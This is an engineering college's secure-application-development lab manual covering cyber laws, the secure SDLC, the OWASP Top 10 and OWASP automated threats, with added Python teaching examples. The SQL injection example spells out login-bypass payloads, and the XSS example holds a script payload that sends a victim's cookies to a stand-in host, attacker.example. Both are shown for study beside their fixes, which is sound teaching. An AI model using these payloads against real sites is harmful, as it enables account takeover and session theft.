
ICOE/IT/7TH SEM/SAD/LAB MANUAL

Indala College of Engineering, Bapsai.

Department
Of
Information Technology
Secure Application Development Lab Manual



DEPARTMENT OF INFORMATION TECHNOLOGY
Lab Manual for the Academic Year 2024-25


(In accordance with the University of Mumbai syllabus)


NAME :

ROLL NO :

SUBJECT : SAD Lab

SUBJECT CODE: ITL703

SEMESTER : VII

STREAM : Information Technology

Subject In-charge
Asst. Prof. Gauri Bhosale


Lab Objectives: Students will be able:

1. To understand secure programming of application code.

2. To understand the OWASP methodologies and standards.

3. To understand and identify the main vulnerabilities inherent in applications.

4. To understand how data validation and authentication can be applied to an application.

5. To understand how to apply security to session management.

6. To understand how to apply secure coding for cryptography.

Lab Outcome: Students will learn to:

1. Apply secure programming of application code.

2. Understand the OWASP methodologies and standards.

3. Identify the main vulnerabilities inherent in applications.

4. Apply data validation and authentication to an application.

5. Apply security to session management.

6. Apply secure coding for cryptography.

Hardware Requirements:
PC With following Configuration

1. Intel Core i3/i5/i7 Processor

2. 4 GB RAM

3. 500 GB Hard disk

Software Requirements:
1. Web application stack: HTML5, CSS3, Java, C, Python, MySQL or another database.

2. Internet connection, browser, security tools (SAST tools, an intercepting proxy such as Burp Suite, etc.).


INTRODUCTION:
This manual is organized in such a way that the students can directly use it in the laboratory.

Each laboratory exercise comprises of:

1. Statement of the problem (Aim)

2. Theory

3. Output

4. Conclusion


LIST OF EXPERIMENTS

Sr.No.  Title of Experiment                                              LO addressed  PO addressed  PSO addressed  Week number
1       To study different laws and standards of cyber security          L703.1        PO1, PO6      PSO1           W1
2       To learn a case study for the SDLC                               L703.2        PO1           PSO1           W2
3       To study threat modeling                                         L703.2        PO2, PO5      PSO2           W3
4       To study at least any 5 methodologies of OWASP                   L703.2        PO2           PSO2           W4
5       To study at least any 5 OAT: Denial of Inventory for an
        e-commerce website                                               L703.2        PO2, PO3      PSO2           W5
6       To apply an SQL injection vulnerability that allows the login
        page to be bypassed                                              L703.4        PO4           PSO3           W7
7       To implement Burp Proxy to test web applications                 L703.5        PO3           PSO3           W8
8       To study symmetric and asymmetric cryptography                   L703.6        PO1           PSO1           W9
9       To study and understand hashing                                  L703.6        PO1, PO3      PSO1           W10


Experiment – 1: Study various laws and standards of cyber security

1. Aim: To study different laws and standards of cyber security.

2. Objectives: After studying this experiment, the student will be able to
●Understand different cyber security laws.

●Identify and learn different standards of cyber security.

3. Outcomes: After studying this experiment, the student will be able to

●Demonstrate knowledge of different laws and standards of cyber security.

4. Prerequisite: Programming concepts, cyber security basics.

5. Requirements: PC and Internet
6. Brief Theory:
Cyber Security Introduction:
Cyber security has become a primary concern because cyber threats and attacks keep growing. Attackers use increasingly sophisticated techniques to target systems, and individuals, small businesses and large organizations are all affected. IT and non-IT firms alike have understood the importance of cyber security and are focusing on adopting every reasonable measure to deal with cyber threats.

What is cyber security?

"Cyber security is primarily about people, processes, and technologies working together to encompass the full range of threat reduction, vulnerability reduction, deterrence, international engagement, incident response, resiliency, and recovery policies and activities, including computer network operations, information assurance, law enforcement, etc."

Alternatively: cyber security is the body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access. The term refers to the techniques and practices that protect digital data, that is, the data stored, transmitted or used on an information system. Put another way, cyber security is the protection of Internet-connected systems, including hardware, software and data, from cyber-attacks. The term is made up of two words: "cyber" refers to the technology, which includes systems, networks, programs and data, whereas "security" refers to protection, which includes system security, network security, application security and information security.

Why is cyber security important?

Listed below are the reasons why cyber security is so important in what has become a predominantly digital world:

1. Cyber-attacks can be extremely expensive for businesses to endure. In addition to the financial damage suffered by the business, a data breach can also inflict untold reputational damage.

2. Cyber-attacks are becoming progressively more destructive. Cybercriminals are using more sophisticated methods to initiate cyber-attacks.


3. Regulations such as the GDPR are forcing organizations to take better care of the personal data they hold.

Because of the above reasons, cyber security has become an important part of business, and the focus now is on developing appropriate response plans that minimize the damage in the event of a cyber-attack.

Types of Cyber Attacks

A cyber-attack is an exploitation of computer systems and networks. It uses malicious code or crafted input to alter computer code, logic or data and leads to cybercrimes such as information and identity theft.

Cyber-attacks can be classified into the following categories:

1) Web-based attacks
2) System-based attacks

Web-based attacks
These are attacks that target a website or web application. Some of the important web-based attacks are as follows.

1. Injection attacks

An injection attack supplies crafted data to a web application so that it is interpreted as part of a command or query, which manipulates the application and extracts the information the attacker wants. Examples: SQL injection, code injection, log injection, XML injection, etc.

2. DNS Spoofing

DNS spoofing (also called DNS cache poisoning) introduces forged data into a DNS resolver's cache, causing the resolver to return an incorrect IP address and diverting traffic to the attacker's computer or any other computer the attacker chooses. DNS spoofing attacks can go on for a long period of time without being detected and can cause serious security issues.

3. Session Hijacking:

This is an attack on a user's session with a web application. Web applications issue session cookies (or tokens) to store state and identify the logged-in user. By stealing the cookie, an attacker can act as that user and gain access to all of the user's data.

4. Phishing:

Phishing is a type of attack that attempts to steal sensitive information such as login credentials and credit card numbers. It occurs when an attacker masquerades as a trustworthy entity in electronic communication.

5. Brute force:

This is a trial-and-error attack. It generates a large number of guesses and validates each one in order to recover the real value, such as a user's password or personal identification number. This attack may be used by criminals to crack passwords or encrypted data, or by security analysts to test an organization's defences.

6. Denial of Service:

This is an attack meant to make a server or network resource unavailable to its users. It accomplishes this by flooding the target with traffic or by sending it input that triggers a crash. A plain DoS attack uses a single system and a single Internet connection to attack a server (a distributed DoS, or DDoS, uses many). It can be classified into the following:

●Volume-based attacks: the goal is to saturate the bandwidth of the attacked site; they are measured in bits per second.


●Protocol attacks: these consume actual server or intermediate-equipment resources (for example connection-state tables); they are measured in packets per second.

●Application layer attacks: the goal is to exhaust or crash the web server itself; they are measured in requests per second.

7. Dictionary attacks:

This type of attack uses a stored list of commonly used passwords and tries each one in turn to recover the original password. It is a brute-force attack narrowed down to likely candidates.

8. URL Interpretation:

This is an attack in which certain parts of a URL are changed (for example an identifier or a path segment) so that the web server delivers pages the attacker is not authorized to browse.

9. File Inclusion attacks:

This attack allows an attacker to access unauthorized or sensitive files available on the web server, or to execute malicious files on the web server, by abusing the application's include functionality (local or remote file inclusion).

10. Man in the middle attacks:

This attack allows an attacker to intercept the connection between client and server and act as a bridge between them. The attacker is then able to read, insert and modify the data in the intercepted connection.
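The brute-force and dictionary attacks above (and OAT-007 Credential Cracking and OAT-008 Credential Stuffing in Experiment 5) leave a characteristic trace in authentication logs: a burst of failures against one account from one source, or one source cycling through many accounts. The following added example, which is not part of this manual, runs a small sliding-window detector over constructed log lines; the log format, the 5-minute window and the two thresholds are assumptions chosen for illustration.

```python
"""Spotting brute-force / dictionary (credential cracking) and credential
stuffing in login logs.

Added example for this lab manual, not code from the manual or from any
vendor. Assumptions: one line per login attempt in the form
"<ISO timestamp> <client IP> <username> <OK|FAIL>", a 5-minute window and
the two thresholds below.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic). 203.0.113.5 hammers one account,
# 198.51.100.7 tries one password against many accounts, 192.0.2.9 is a
# legitimate user who mistypes once.
SAMPLE_LOG = """\
2024-09-01T10:00:01 203.0.113.5 alice FAIL
2024-09-01T10:00:03 203.0.113.5 alice FAIL
2024-09-01T10:00:05 203.0.113.5 alice FAIL
2024-09-01T10:00:07 203.0.113.5 alice FAIL
2024-09-01T10:00:09 203.0.113.5 alice FAIL
2024-09-01T10:00:11 203.0.113.5 alice FAIL
2024-09-01T10:01:00 198.51.100.7 bob FAIL
2024-09-01T10:01:02 198.51.100.7 carol FAIL
2024-09-01T10:01:04 198.51.100.7 dave OK
2024-09-01T10:01:06 198.51.100.7 erin FAIL
2024-09-01T10:01:08 198.51.100.7 frank FAIL
2024-09-01T10:02:00 192.0.2.9 alice FAIL
2024-09-01T10:02:20 192.0.2.9 alice OK
2024-09-01T10:30:00 203.0.113.5 alice FAIL
"""

WINDOW = timedelta(minutes=5)      # sliding window per source IP (assumed)
FAIL_THRESHOLD = 5                 # failures on one account -> cracking
DISTINCT_USER_THRESHOLD = 4        # distinct accounts from one IP -> stuffing


def parse_line(line):
    """Return (timestamp, ip, username, success) for one log line."""
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result == "OK"


def analyse(log_text, window=WINDOW):
    """Return {ip: sorted findings} for source IPs that look automated.

    For every attempt we look back over the window of earlier attempts from
    the same IP: many failures against a single account is cracking (the
    brute-force/dictionary pattern); many different accounts from one IP,
    regardless of outcome, is the stuffing pattern.
    """
    events = sorted(parse_line(line) for line in log_text.splitlines() if line.strip())
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))

    findings = defaultdict(set)
    for ip, attempts in by_ip.items():
        start = 0
        for end, (ts, _, _) in enumerate(attempts):
            while ts - attempts[start][0] > window:   # drop attempts outside the window
                start += 1
            recent = attempts[start:end + 1]
            fails_per_user = Counter(u for _, u, ok in recent if not ok)
            if fails_per_user and max(fails_per_user.values()) >= FAIL_THRESHOLD:
                findings[ip].add("credential-cracking")
            if len({u for _, u, _ in recent}) >= DISTINCT_USER_THRESHOLD:
                findings[ip].add("credential-stuffing")
    return {ip: sorted(kinds) for ip, kinds in findings.items()}


if __name__ == "__main__":
    for ip, kinds in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(kinds)}")
```

Run it to list the flagged source IPs. In a real deployment the window and thresholds would be tuned against the application's normal login-failure rate, and the detector would feed a lockout or rate limit rather than only a report.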

System-based attacks:

These are attacks intended to compromise a computer or a computer network. Some of the important system-based attacks are as follows.

1. Virus:

A virus is a malicious program that spreads through the computer's files without the knowledge of the user. It is self-replicating: it inserts copies of itself into other programs or files, which spread it further when they are executed. It can also execute instructions that harm the system.

2. Worm:

A worm is malware whose primary function is to replicate itself in order to spread to uninfected computers. Unlike a virus, it does not need to attach itself to a host program; it spreads on its own over the network. Worms often arrive through e-mail attachments that appear to come from trusted senders.

3. Trojan horse:

A Trojan horse is a malicious program that misleads the user about its true intent. It appears to be a normal application, but when it is opened or executed, malicious code runs in the background, causing unexpected changes to computer settings and unusual activity even when the computer should be idle.

4. Backdoors:

A backdoor is a method of bypassing the normal authentication process. A developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes; if it ships in the product, attackers can use it too.

5. Bots:

A bot (short for "robot") is an automated process that interacts with other network services. Some bots run automatically, while others only execute commands when they receive specific input. Common examples are web crawlers, chatroom bots and malicious bots.


7. Laboratory Exercise

i. Procedure

a. Study and explain various laws of cyber security.

b. Write down various standards of cyber security.

ii. Result/Observation/Program code

8. Post-Experiment Exercise

A. Extended Theory:

Describe the statistics of the main vulnerabilities.

B. Questions:

1. What are the different types of attacks?

2. What do you understand by a cyber-attack?

C. Conclusion:

1. Write what was performed in the experiment.

2. Write the significance of the topic studied in the experiment.

D. References:

1. https://mrcet.com/pdf/Lab%20Manuals/IT/CYBER%20SECURITY%20(R18A0521).pdf

2. Cyber Security Essentials, James Graham, Richard Howard and Ryan Olson, CRC Press.

3. Introduction to Cyber Security, Chwan-Hwa (John) Wu and J. David Irwin, CRC Press (Taylor & Francis Group).


Experiment – 2: To learn a case study for the SDLC

Aim: To learn a case study for the SDLC.
Objectives: After studying this experiment, the student will be able to understand the different steps of the SDLC.
Outcomes: After studying this experiment, the student will be able to demonstrate knowledge of the different stages of the SDLC.
Prerequisite: Cyber security, software engineering
Requirements: PC and Internet
Pre-Experiment Exercise:
Brief Theory:
What Is a Secure SDLC and Why Is It Important?
The Security System Development Life Cycle (SecSDLC) is a set of procedures executed in sequence alongside the software development life cycle (SDLC). It is designed to help developers create software and applications in a way that significantly reduces security risk at later stages by addressing it from the start. The SecSDLC is similar to the SDLC, but the two differ in the activities carried out in each phase. The SecSDLC aims to reduce security vulnerabilities: the process involves identifying threats and the risks they pose to a system, and implementing the security controls needed to counter, remove or manage those risks. In the plain SDLC, by contrast, the focus is mainly on the design and implementation of an information system.

Phases involved in the SecSDLC are:

●System Investigation: This process is initiated by directives from top-level management in the organization. The objectives and goals of the project are considered first. An information security policy is defined which describes the security applications and programs to be installed and how they are implemented in the organization's systems.

●System Analysis: In this phase the documents from the System Investigation phase are analysed in detail. Existing security policies, applications and software are analysed to check for flaws and vulnerabilities in the system, and upcoming threat possibilities are assessed. Risk management falls under this phase.

●Logical Design: This phase develops the blueprints for the various information security policies, their applications and software. Backup and recovery policies are drafted to prevent future losses, and the steps the business will take in case of a disaster are planned. The decision whether to outsource is also made in this phase: it is analysed whether the project can be completed within the company or needs to be sent to another company for the specific task.

●Physical Design: The technical teams acquire the tools and follow the blueprints needed to implement the software and apply the system security. During this phase different solutions are investigated for unforeseen issues that may be encountered in the future; they are analysed and documented in order to cover vulnerabilities missed during the analysis phase.


●Implementation: The solution decided on in earlier phases is finalized, whether the project is in-house or outsourced. Proper documentation of the product is provided to show that the requirements specified for the project are met. Implementation and integration are carried out with the help of various teams that test aggressively whether the product meets the system requirements specified in the system documentation.

●Maintenance: After the security program is implemented it must be ensured that it functions properly and is managed accordingly. The security program must be kept up to date to counter new threats that were not visible at design time.

Laboratory Exercise
Procedure
Study any one of the case studies from the references and note the difference between the software development life cycle and the security development life cycle.
Result/Observation/Program code
State the purpose of the case study and your findings.
Post-Experiment Exercise

Extended Theory:
Describe how secure coding can be incorporated into the software development process. List the major types of coding errors and their root causes. Describe good software development practices and explain how they impact application security.

Questions:
List and discuss Secure SDLC best practices.

Conclusion:
Write what was performed in the experiment.

Write the significance of the topic studied in the experiment.

References:
Case study 1: https://quod.lib.umich.edu/j/jsais/11880084.0001.103/--case-study-of-the-application-of-the-systems-development?rgn=main;view=fulltext

Case study 2: https://onlinelibrary.wiley.com/doi/epdf/10.1002/sec.1700

Secure SDLC overview: https://snyk.io/learn/secure-sdlc/


Experiment – 3: To study Threat Modeling

Aim: To study threat modeling.
Objectives: After studying this experiment, the student will be able to identify security requirements, pinpoint security threats and potential vulnerabilities, quantify threat and vulnerability criticality, and prioritize remediation methods.

Outcomes: After studying this experiment, the student will be able to produce a detailed document that captures potential threats, their severity, mitigation ideas and the corresponding actions.

Prerequisite: Software engineering

Requirements: PC and Internet, Microsoft Threat Modeling Tool
Brief Theory:


Conclusion: Threat modeling was carried out successfully.


Experiment – 4: To study the OWASP Top 10 security risks (vulnerabilities) published by OWASP

Objective:
●To describe a standard awareness document for developers and web application security.

●To understand the OWASP methodologies and standards.

Course Outcome: Illustrate the OWASP methodologies and standards.

Theory: What is the OWASP Top 10?

The OWASP Top 10 is a standard awareness document that lists the ten most impactful web application security risks. The Open Web Application Security Project (OWASP) Foundation publishes a new edition every few years (2013, 2017, 2021). OWASP collects data from companies that specialize in application security and from individuals through industry surveys. The results are ranked by impact and prevalence, and the top ten risks are selected. The OWASP Top 10 does not cover every vulnerability, but it is a solid start for security testers, developers and organizations that want to find these weaknesses and implement measures to protect against them.

OWASP Top 10 vulnerabilities (2017 edition)

This section summarizes each of the ten security risks of the 2017 edition; the changes made in the 2021 edition follow afterwards. Once you have worked through all of them you will have a solid understanding and will be ready to test for the OWASP Top 10 vulnerabilities on your own.

Injection
Injection is a security risk you can find on pretty much any target. It happens when a server-side interpreter processes untrusted user input as part of a command or a query. Many vulnerabilities fall under injection; here are some examples:

●SQL injection: present when the developer builds a SQL query from a parameter you control. If you successfully exploit it, you can read data from the database, modify it or delete it altogether, and in a login form you can bypass authentication.

●OS command injection: happens when user input is used as part of an insecure call to operating system commands. If you find one, you can run arbitrary operating system commands on the vulnerable server.

●XPath injection: targets the query language used for XML documents. When you control part of the query, you can bypass restrictions, read unauthorized XML nodes, etc.

●Server-Side Template Injection: affects applications that use template engines to render server-side data. If user input is concatenated into the template itself (rather than passed to it as a variable), you can often achieve remote code execution.

●LDAP injection: when your target insecurely uses user input to build an LDAP query, you can inject into the filter to bypass restrictions, read unauthorized data, etc.
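As an added example (not code from this manual or from OWASP), the SQL injection case above, and the login-page bypass that Experiment 6 in the list of experiments asks for, can be reproduced with Python's built-in sqlite3 module. The users table and both payloads are constructed for illustration.

```python
"""SQL injection in a login check: the vulnerable string-built query beside
the parameterised fix.

Added example for this lab manual, not the manual's own code. It uses an
in-memory SQLite database with two constructed users; a real application
would store password hashes (see Experiment 9), never plaintext.
"""
import sqlite3


def make_db():
    """Create the sample users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into SQL, so input can rewrite the WHERE clause."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Binds input as parameters: the driver keeps it data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic bypass payloads: comment out the password check, or make the
# WHERE clause always true (AND binds tighter than OR, so the OR wins).
COMMENT_PAYLOAD = ("admin'--", "wrong")
TAUTOLOGY_PAYLOAD = ("nobody", "' OR '1'='1")


def demo():
    """Run both logins against both payloads and a genuine credential."""
    conn = make_db()
    return {
        "vulnerable/comment": login_vulnerable(conn, *COMMENT_PAYLOAD),
        "vulnerable/tautology": login_vulnerable(conn, *TAUTOLOGY_PAYLOAD),
        "safe/comment": login_safe(conn, *COMMENT_PAYLOAD),
        "safe/tautology": login_safe(conn, *TAUTOLOGY_PAYLOAD),
        "safe/real": login_safe(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    for case, user in demo().items():
        print(f"{case:22s} -> {'logged in as ' + user if user else 'rejected'}")
```

The fix is not input filtering but parameter binding: login_safe compares the very same payloads as literal strings and rejects them. The table and plaintext passwords exist only to keep the example small; credentials must be stored as salted hashes.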

Broken authentication and session management:

Authentication is the feature that verifies an identity's claims. For example, when you log in to an application, it uses your username and password to verify that you are indeed who you claim to be. Upon authentication, and because HTTP is stateless, the application provides you with a session identifier representing your identity, which your web browser sends on subsequent requests. The application also needs sign-up, login, password reset and multi-factor authentication, so authentication is hard to implement without mistakes. Any flaw in one of those features, or in how the session identifier is generated, transmitted or expired, can lead to broken authentication.

Sensitive data exposure:

If your IT assets disclose data that is not meant to be publicly accessible, they suffer from sensitive data exposure. The data can be at rest, such as databases or files, or in transit, especially if you use no encryption or weak encryption for data transmission. Apart from exposing your customers' data, which is a scandal in itself, you will also face fines: under the GDPR they can go up to 20 million Euros or 4% of annual worldwide turnover, whichever is higher.

XML External Entity (XXE):

XXE is a flaw in the way XML parsers are configured. The vulnerability arises when the parser evaluates DTDs and resolves external entities. It allows an attacker to read files from the server, list directories, make the server issue requests to internal systems, and even cause a denial of service (for example through recursive entity expansion, the "billion laughs" attack).

Broken access control:

Broken access control happens when the application allows a user to perform actions they are not authorized to perform. Many vulnerabilities contribute to this risk. For instance, if the developer forgets to validate permissions when handling object identifiers, the application becomes vulnerable to Insecure Direct Object Reference (IDOR). Others include Cross-Site Request Forgery (CSRF), Cross-Origin Resource Sharing (CORS) misconfigurations and forced browsing.

Security misconfiguration:
Security misconfiguration, as the name suggests, exposes vulnerabilities through weak configuration of an IT asset. It does not affect web assets only: any component that requires configuration is subject to it, so network devices, hardware, e-mail services and so on can all suffer from it. For instance, a smart door lock may ship with a default administration PIN; if you do not change it, anyone can access and change the device's configuration. In web applications you find things like directory listing enabled, which lets anyone list all files and directories, or debug mode left on, which gives an attacker more insight into the inner workings of the vulnerable application (stack traces, configuration values).

Cross-site Scripting (XSS):

This is one of the most famous client-side vulnerabilities. It allows an attacker to run arbitrary JavaScript in the victim's web browser, within the origin of the vulnerable site. XSS becomes possible when user input ends up inside an HTML page or a piece of JavaScript without proper encoding for the context in which it lands. There are three types of XSS:

●Stored XSS happens when user input is saved in the application's datastore, then retrieved and rendered in a page without proper encoding.


●Reflected XSS happens when user input from the current request is returned directly into the HTML page without proper encoding.

●DOM XSS happens when client-side JavaScript itself writes user-controlled data (for example from the URL fragment) into the page. Here it is possible to exploit XSS even if the payload never reaches the server.
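As an added example (not from this manual), the following Python shows the stored/reflected case for two contexts, an HTML element body and a quoted attribute, with the unencoded rendering beside the encoded one. It uses only the standard library's html.escape and html.parser; the two templates and both payloads are constructed. parse_tags shows what a browser-like parser makes of each rendering, which is the check that matters.

```python
"""Cross-site scripting: user input placed into HTML as-is, beside the
output-encoded version, for the element-body and attribute contexts.

Added example for this lab manual, not code from the manual. The two tiny
templates (a comment paragraph and a pre-filled input field) and the
payloads are constructed for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed attacker inputs: a script element for the body context and a
# quote-breakout that adds an event handler in the attribute context.
SCRIPT_PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_comment_vulnerable(comment):
    """Stored/reflected XSS: the comment text becomes markup."""
    return "<p>" + comment + "</p>"


def render_comment_safe(comment):
    """Encode for the HTML body context: < > & (and quotes) become entities,
    so the browser shows the payload as text instead of executing it."""
    return "<p>" + html.escape(comment) + "</p>"


def render_field_vulnerable(value):
    """A quoted attribute built from input: a " in the input closes the
    attribute and lets the attacker add new ones (event handlers)."""
    return '<input name="nick" value="' + value + '">'


def render_field_safe(value):
    """quote=True encodes " and ' as well, which the attribute context needs
    on top of the body-context encoding."""
    return '<input name="nick" value="' + html.escape(value, quote=True) + '">'


class _TagCollector(HTMLParser):
    """Records (tag, attrs) the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """Return the start tags a parser finds in markup, with their attributes."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for label, markup in [
        ("body, unencoded", render_comment_vulnerable(SCRIPT_PAYLOAD)),
        ("body, encoded", render_comment_safe(SCRIPT_PAYLOAD)),
        ("attribute, unencoded", render_field_vulnerable(ATTR_PAYLOAD)),
        ("attribute, encoded", render_field_safe(ATTR_PAYLOAD)),
    ]:
        print(f"{label}: {markup}\n    parser sees: {parse_tags(markup)}")
```

Encoding must match the context: the body context needs < > & encoded, a quoted attribute additionally needs the quote characters, and a JavaScript or URL context needs its own escaping. For DOM XSS the same discipline applies in the client code (assign untrusted strings with textContent or setAttribute rather than innerHTML).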

Insecure deserialization

Insecure deserialization happens when the application deserializes data a user sends without checking it. This is another case where a lack of input validation can lead to serious security problems. It is hard to exploit, but when it works it can lead to remote code execution or denial of service.

Using components with known vulnerabilities

You might have fully secured your own code, but what about the dependencies you use? Have you checked them, or just imported them? There is a high chance that one or more of them are vulnerable. Using components with known vulnerabilities has led to many serious breaches in the past and will cause many more. Tools to check for them (software composition analysis) already exist.

Insufficient logging and monitoring

When an attacker infiltrates a network, the IT systems generate traffic that usually does not match normal activity, unless you are dealing with highly skilled attackers who have the time and money to target your infrastructure. If you cannot detect this abnormal behaviour quickly, you are giving them the time they need to achieve their goal. Logging and monitoring should be part of your essential security infrastructure, because you simply cannot defend what you do not know about.

OWASP Top 10 vulnerabilities 2021:

●A01:2021-Broken Access Control moves up from the fifth position to the category with the most serious web application security risk; the contributed data indicates that on average 3.81% of applications tested had one or more Common Weakness Enumerations (CWEs) in this category, with more than 318k occurrences. The 34 CWEs mapped to Broken Access Control had more occurrences in applications than any other category.

●A02:2021-Cryptographic Failures shifts up one position to #2. It was previously known as A3:2017-Sensitive Data Exposure, which was a broad symptom rather than a root cause. The renewed name focuses on failures related to cryptography, as it implicitly did before. This category often leads to sensitive data exposure or system compromise.

●A03:2021-Injection slides down to the third position. 94% of the applications were tested for some form of injection, with a maximum incidence rate of 19% and an average incidence rate of 3.37%; the 33 CWEs mapped into this category have the second most occurrences in applications, with 274k occurrences. Cross-site Scripting is now part of this category.

●A04:2021-Insecure Design is a new category for 2021, with a focus on risks related to design flaws. If we genuinely want to "move left" as an industry, we need more threat modelling, secure design patterns and principles, and reference architectures. An insecure design cannot be fixed by a perfect implementation because, by definition, the needed security controls were never created to defend against specific attacks.

●A05:2021-Security Misconfiguration moves up from #6 in the previous edition. The former category A4:2017-XML External Entities (XXE) is now part of this risk category.

●A06:2021-Vulnerable and Outdated Components was previously titled Using Components with Known Vulnerabilities and is #2 in the Top 10 community survey.

●A07:2021-Identification and Authentication Failures was previously Broken Authentication and slides down from the second position; it now includes CWEs that are more related to identification failures. This category is still an integral part of the Top 10, but the increased availability of standardized frameworks seems to be helping.

●A08:2021-Software and Data Integrity Failures is a new category for 2021, focusing on assumptions made about software updates, critical data and CI/CD pipelines without verifying integrity. It has one of the highest weighted impacts from Common Vulnerabilities and Exposures / Common Vulnerability Scoring System (CVE/CVSS) data mapped to the 10 CWEs in this category. A8:2017-Insecure Deserialization is now part of this larger category.

●A09:2021-Security Logging and Monitoring Failures was previously A10:2017-Insufficient Logging & Monitoring and is added from the Top 10 community survey, moving up from #10. This category is expanded to include more types of failures, is challenging to test for, and is not well represented in the CVE/CVSS data. However, failures in this category can directly impact visibility, incident alerting and forensics.

●A10:2021-Server-Side Request Forgery is added from the Top 10 community survey. The data shows a relatively low incidence rate with above-average testing coverage, along with above-average ratings for exploit and impact potential. This category represents the scenario where the security community members are telling us this is important, even though it is not illustrated in the data at this time.

Conclusion: The OWASP Top 10 web application vulnerabilities represent a broad consensus among security experts on the most common security risks facing organizations. The vision behind the OWASP Top 10 Application Security Risks is to build a culture of secure web development and web application security through awareness.


Experiment – 5: Study of 5 OAT: Denial of Inventory.

Objective:
●To describe a standard awareness document for developers and web application security (the OWASP Automated Threat Handbook).

●To understand the OAT threats, their detection methods and countermeasures.

Course Outcome: Illustrate the OWASP methodologies and standards.

Theory:
OAT-021 Denial of Inventory is the selection and holding of items from a limited inventory or stock which are never actually bought, paid for or confirmed, such that other users are unable to buy, pay for or confirm the items themselves. It differs from OAT-005 Scalping in that the goods or services are never actually acquired by the attacker. Denial of Inventory is most commonly thought of as taking e-commerce items out of circulation by adding many of them to a cart/basket; the attacker never proceeds to checkout to buy them but contributes to a possible stock-out condition. A variation of this automated threat event is making reservations (e.g. hotel rooms, restaurant tables, holiday bookings, flight seats) and/or click-and-collect orders without payment. The same exhaustion of inventory availability also occurs in other types of web application, such as the assignment of non-goods like service allocations, product rations, availability slots, queue positions and budget apportionments. If it is server resources that are being depleted, see OAT-015 Denial of Service instead. Like OAT-005 Scalping, Denial of Inventory reduces the availability of goods or services.

Other names and examples: Hoarding; hold-all attack; inventory depletion; inventory exhaustion; stock exhaustion.
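The defence against Denial of Inventory is to make held stock a time-limited, capped resource and to watch for sessions that hold stock and never pay. The following added Python model (not code from the OAT handbook or from this manual) shows one way to do that; the 15-minute hold, the cap of three units per session and the flagging threshold are assumptions.

```python
"""Countermeasure and detection for OAT-021 Denial of Inventory: cart holds
that expire and a per-session cap, plus a count of how often a session lets
its hold lapse without buying.

Added example for this lab manual, not code from OWASP or the manual. The
store model, the 15-minute hold, the cap of 3 units per session and the
flagging threshold are all assumptions.
"""
from collections import Counter
from datetime import datetime, timedelta

HOLD_TTL = timedelta(minutes=15)   # how long a cart hold keeps stock off the shelf
MAX_PER_SESSION = 3                # units one session may hold at once


class Inventory:
    def __init__(self, stock):
        self.stock = stock          # units on hand, not yet sold
        self.holds = {}             # session_id -> (quantity, expires_at)
        self.lapsed = Counter()     # session_id -> holds that expired unpaid

    def _expire(self, now):
        """Release holds past their TTL; remember who let them lapse."""
        for sid in [s for s, (_, exp) in self.holds.items() if exp <= now]:
            del self.holds[sid]
            self.lapsed[sid] += 1

    def available(self, now):
        """Units a new customer could still reserve right now."""
        self._expire(now)
        return self.stock - sum(q for q, _ in self.holds.values())

    def reserve(self, session_id, qty, now):
        """Add qty to the session's hold; refuse if over the cap or out of stock."""
        self._expire(now)
        held, _ = self.holds.get(session_id, (0, None))
        if held + qty > MAX_PER_SESSION:
            return False
        if qty > self.available(now):
            return False
        self.holds[session_id] = (held + qty, now + HOLD_TTL)   # TTL restarts on change
        return True

    def checkout(self, session_id, now):
        """Turn a live hold into a sale."""
        self._expire(now)
        if session_id not in self.holds:
            return False
        qty, _ = self.holds.pop(session_id)
        self.stock -= qty
        return True

    def flagged(self, threshold):
        """Sessions that repeatedly held stock and never paid (hoarding signal)."""
        return sorted(s for s, n in self.lapsed.items() if n >= threshold)


if __name__ == "__main__":
    t0 = datetime(2024, 9, 1, 10, 0)
    inv = Inventory(stock=10)
    for i in (1, 2, 3, 4):                      # a bot spreads holds over sessions
        print(f"bot-{i} reserves 3:", inv.reserve(f"bot-{i}", 3, t0))
    print("customer reserves 1:", inv.reserve("cust-a", 1, t0 + timedelta(minutes=1)))
    print("customer pays:", inv.checkout("cust-a", t0 + timedelta(minutes=2)))
    t1 = t0 + timedelta(minutes=16)
    print("available after holds lapse:", inv.available(t1))
    print("flagged sessions:", inv.flagged(1))
```

Run the scenario in the main block: three bot sessions can still tie up nine units for fifteen minutes, so the cap only limits the damage per session; the expiry returns the stock, and the lapsed counter identifies sessions worth challenging (CAPTCHA, step-up verification or a block) before they are allowed another hold.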

OAT catalogue summary:

This section summarizes the automated threats in the OWASP Automated Threat (OAT) handbook, grouped by the business function they abuse.

Login & Account Fraud: automated threats related to compromising account credentials

• OAT-007 Credential Cracking: Seeks to hijack customers' accounts by trying many variations of credentials; it can be identified by an increase in failed login attempts.
• OAT-008 Credential Stuffing: Reuses stolen credentials to see whether they match the ones used on the site, leading to account takeover.
• OAT-019 Account Creation: Creates new fake accounts for nefarious purposes, such as spreading malware or evading defences by acting as a different user when carrying out automated attacks.

Inventory Abuse: automated threats related to the availability of inventory to legitimate users

